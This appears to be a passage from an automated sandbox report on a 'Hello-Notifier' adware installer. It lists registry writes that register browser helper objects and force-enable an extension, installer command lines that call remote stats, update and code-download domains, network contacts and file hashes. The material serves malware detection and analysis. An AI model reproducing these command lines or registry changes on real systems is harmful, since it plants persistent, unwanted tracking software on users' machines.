| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CLSID\ = "{22222222-2222-2222-2222-220322792228}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\ = "CrossriderApp0037928.Sandbox" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ = "Hello-Notifier" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ = "CrossriderApp0037928.Sandbox" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\VersionIndependentProgID\ = "CrossriderApp0037928.Sandbox" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55555555-5555-5555-5555-550355795528}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\ = "CrossriderApp0037928" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID\ = "CrossriderApp0037928.Sandbox.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID\ = "CrossriderApp0037928.BHO.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID\ = "{11111111-1111-1111-1111-110311791128}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\ = "ICrossriderBHO" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\0\win64\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe
"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"
C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
"C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nso408.tmp\extensionData'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
C:\Windows\system32\taskeng.exe
taskeng.exe {7C836E48-4AFF-4099-9BC0-4F8A566DADB7} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=508EF827A2C94D79B59DCE53EB965A11IE /verifier=35ce2a1a154a4ea1f218b470c6b012c5 /installerversion=1_34_1_29 /installationtime=1729894741 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | update.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | update.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | errors.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | errors.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | stats.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | stats.mstatsserv.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | app-static.crossrider.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\System.dll
| MD5 | 00a0194c20ee912257df53bfe258ee4a |
| SHA1 | d7b4e319bc5119024690dc8230b9cc919b1b86b2 |
| SHA256 | dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3 |
| SHA512 | 3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667 |
\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\WrapperUtils.dll
| MD5 | 7a18f06f0935a9e98a14d47d77064573 |
| SHA1 | 58b12858557fb39cf876b6e76e585cf581b53590 |
| SHA256 | 422a61da2bedfdc8167cb022b4b5e0ff8588dc1e6bd40b3c4ba97588836f1b0f |
| SHA512 | 356fa81d066db57054d5477e96d12ca9a5e9639731c06d61dc320dc52bf6054f603523e2da3751a96a4608dc19c20868ed3573ccdf3d32bef025035770a434e6 |
\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\StdUtils.dll
| MD5 | 21010df9bc37daffcc0b5ae190381d85 |
| SHA1 | a8ba022aafc1233894db29e40e569dfc8b280eb9 |
| SHA256 | 0ebd62de633fa108cf18139be6778fa560680f9f8a755e41c6ab544ab8db5c16 |
| SHA512 | 95d3dbba6eac144260d5fcc7fcd5fb3afcb59ae62bd2eafc5a1d2190e9b44f8e125290d62fef82ad8799d0072997c57b2fa8a643aba554d0a82bbd3f8eb1403e |
\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe
| MD5 | a4c3e2148c1e6f2298ca76e998d32efb |
| SHA1 | 309b580cf1386e24eba522c79c4d7ce2d1fd84a9 |
| SHA256 | 7f0141ce147904a3c0debd19f46cb1111ce6315459b34b34b5039ed670862cd4 |
| SHA512 | 234578790ff105eb7dde8ce6b785fbbd413a11aec85d6231bd4307ba229844eddb6060c7b5cc7ac545f901a8651966b02f350cb26fcc08c1dc7e0309455e5fc1 |
\Users\Admin\AppData\Local\Temp\nso408.tmp\nsislog.dll
| MD5 | e47100b70748fc790ffe6299cdf7ef2d |
| SHA1 | ad2a9cd5f7c39121926b7c131816e7ba85aeead2 |
| SHA256 | 271d539fe130276189e0a32b8a0bc9f08f2d92f7e17f85d88726735f14ea6144 |
| SHA512 | 88452a9aeff453e7979df9240ab396cbc0c5d00efecda97df1e46f2ba1e9b5bfd990921e85d503beb4b35a1de7681390ba124eeeaf896f250717892ced133e93 |
memory/2116-37-0x0000000000700000-0x0000000000710000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log
| MD5 | 64047dd1c5894f37adfa5ffade7e8ebd |
| SHA1 | ce0f60a680e65944341c155d90156f0da98f7e6a |
| SHA256 | 463498413deb2a320122254c60d12f16a67ac3a3021c6ed2f3af1fcd743a8b7d |
| SHA512 | 96184d59ffb275ed2ec189baba9c12f32c093bcf6e0f80dd5931246face5e0db1660bf9669ff945b7e99b48964087b0c2d07d823abda393aa61e33e50e56a2f0 |
\Users\Admin\AppData\Local\Temp\nso408.tmp\InstallerUtils2.dll
| MD5 | 8c17aa401cdc9bfe61b57f4d4bfec362 |
| SHA1 | 8c580457b636bc30bedb476cebb9a50d9f02651d |
| SHA256 | dfc863b01224a8d3bf35ef6064d6051aab295b9618db72647202f9ca97e45d19 |
| SHA512 | 9fa29aab6cde651a0afb8cacf3dc2ee063b4351c7cf16c49668b2b59062914dbe53c93368e7b2a73a267c4d3eddd513fe7ac282422cf06397d2ad8839c3cd881 |
\Users\Admin\AppData\Local\Temp\nso408.tmp\nsisos.dll
| MD5 | 69806691d649ef1c8703fd9e29231d44 |
| SHA1 | e2193fcf5b4863605eec2a5eb17bf84c7ac00166 |
| SHA256 | ba79ab7f63f02ed5d5d46b82b11d97dac5b7ef7e9b9a4df926b43ceac18483b6 |
| SHA512 | 5e5e0319e701d15134a01cb6472c624e271e99891058aef4dfe779c29c73899771a5b6f8b1cd61b543a3b3defeaecaa080c9cc4e76e84038ca08e12084f128eb |
C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log
| MD5 | 457e3a88c808886ecc7ba8040b67a506 |
| SHA1 | b1be22c75ebdad25a7850ac75aad2501dfd6e451 |
| SHA256 | d1d7f7fa66b4c005fa95ae337e89fcd41e188ce6cbc3d28676ce9dd598709983 |
| SHA512 | b77c1c0932e4699075d4490ab01dbbdc61f359d2ef9953180b81f450d5575060e8df3ad2e6a2d834a11c8ef32e55cb77996edd8f58f42af46739ae39192c8222 |
memory/2116-265-0x0000000000700000-0x0000000000709000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log
| MD5 | 972f2f4d8fdb71a71afcade2f4e96220 |
| SHA1 | 72d98eb2368e6e3f9f7ab2759d0337aa3e47f4c5 |
| SHA256 | e2ed3c0c5b039644f834a483da8febb51b4ef71f723a15ae7df50dd0b2fc5da5 |
| SHA512 | 4d3a983f285239e95e42d45cb18c06071a45698fde224e8642df9ad2d267308fc843f9998f849bb1f4ea9599dc8d6026d36052eff7a08a5f798ff22d75fc1e66 |
\Users\Admin\AppData\Local\Temp\nso408.tmp\InstallerUtils.dll
| MD5 | 895bc798fb0d31e5d3e584ae5701925b |
| SHA1 | d5184d234c1768d3fe671be1512bb58688b37698 |
| SHA256 | 050bcec7226cfe81328bd44de1091355d368f1e9183d232eef1f598ffbd3bc99 |
| SHA512 | b0b0a108f8c21e4f9420245646c546293ea1138580d47dae35b2e467bb2752d7c2cc9df490fdac9e2596acc258dfaa13df8bbf98d45c9f7d77418ac7fdf5cf7b |
\Users\Admin\AppData\Local\Temp\nso408.tmp\UserInfo.dll
| MD5 | 7579ade7ae1747a31960a228ce02e666 |
| SHA1 | 8ec8571a296737e819dcf86353a43fcf8ec63351 |
| SHA256 | 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5 |
| SHA512 | a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b |
\Users\Admin\AppData\Local\Temp\nso408.tmp\inetc.dll
| MD5 | 4c01fdfd2b57b32046b3b3635a4f4df8 |
| SHA1 | e0af8e418cbe2b2783b5de93279a3b5dcb73490e |
| SHA256 | b98e21645910f82b328f30c644b86c112969b42697e797671647b09eb40ad014 |
| SHA512 | cbd354536e2a970d31ba69024208673b1dc56603ad604ff17c5840b4371958fc22bafd90040ae3fb19ae9c248b2cfce08d0bc73cc93481f02c73b86dbc0697b2 |
\Users\Admin\AppData\Local\Temp\nso408.tmp\md5dll.dll
| MD5 | 0745ff646f5af1f1cdd784c06f40fce9 |
| SHA1 | bf7eba06020d7154ce4e35f696bec6e6c966287f |
| SHA256 | fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70 |
| SHA512 | 8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da |
memory/2904-349-0x0000000000400000-0x0000000000499000-memory.dmp
memory/2116-367-0x0000000000400000-0x00000000005B6000-memory.dmp
memory/2116-438-0x0000000000700000-0x0000000000709000-memory.dmp
memory/2116-446-0x00000000037D0000-0x00000000037E0000-memory.dmp
